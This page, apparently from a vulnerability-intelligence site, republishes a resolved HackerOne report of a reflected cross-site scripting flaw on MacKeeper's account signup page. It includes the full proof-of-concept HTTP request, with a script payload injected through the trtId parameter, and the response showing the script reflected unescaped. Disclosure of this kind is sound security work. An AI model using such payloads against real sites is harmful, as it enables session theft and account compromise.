Loading HuntDB...
Hunt
Vulnerability Intelligence by wss.sh
Home Daily Briefings High Impact CVEs Recent Exploits KEV Catalog Latest Updates Security News
Sign In Sign Up

Reflected XSS

Low
C
Clario
Submitted None

Team Summary

Official summary from Clario

### Summary Unauthenticated Reflected Cross-Site Scripting on https://account.mackeeper.com/signup page ### Steps To Reproduce XSS via GET Method HTTP Request: ``` GET /signup?trtId=wrtqvetc%22%3E%3Cscript%3Ealert(%27xss%27)%3C%2fscript%3E&tvrnplhw1=1&vim67=1&gvce1=1 HTTP/1.1 Host: account.mackeeper.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: lang=<cookie and values> Upgrade-Insecure-Requests: 1 ``` HTTP Response: ``` HTTP/1.1 200 OK Date: Tue, 19 Nov 2019 13:13:56 GMT Content-Type: text/html; charset=UTF-8 Connection: close Server: nginx Vary: Accept-Encoding Set-Cookie: jwtToken=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=mackeeper.com; secure; httponly Set-Cookie: jwtToken=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=mackeeper.com; secure; httponly Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache X-Frame-Options: SAMEORIGIN X-Xss-Protection: 1; mode=block Strict-Transport-Security: max-age=31536000; includeSubDomains X-Content-Type-Options: nosniff Content-Length: 24829 <!DOCTYPE html><!--[if lt IE 7 ]> <html class="ie6 sticky-foot-on"> <![endif]--> <!--[if IE 7 ]> <html class="ie7 sticky-foot-on"> <![endif]--> <!--[if IE 8 ]> <html class="ie8 sticky-foot-on"> <![endif]--> <!--[if IE 9 ]> <html class="ie9 sticky-foot-on"> <![endif]--> <!--[if (gt IE 9)|!(IE)]><!--> <html class="sticky-foot-on" lang="en"> <!--<![endif]--> <head> <title>MacKeeper Account</title> <meta charset="UTF-8"> <meta name="robots" content="index, follow" > <--Snippet> </script> <!-- ZeoTranslate --> <div class="pop-up pop-up_loader pop-up_loader-white-bg js-pop-up js-my-licenses-loader" style="display: none;"> <div class="loader"></div> </div> <p class="user-parms-for-events" style="display: none;" data-affid="" data-bundle-id="" data-trt-id="wrtqvetc"><script>alert('xss')</script>" data-prod-id-mk="29" data-prod-id-zs="56" ></p> </body> </html> <--Snippet> ```

Actions:
View on HackerOne
Reported by patient_zero

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Cross-site Scripting (XSS) - Reflected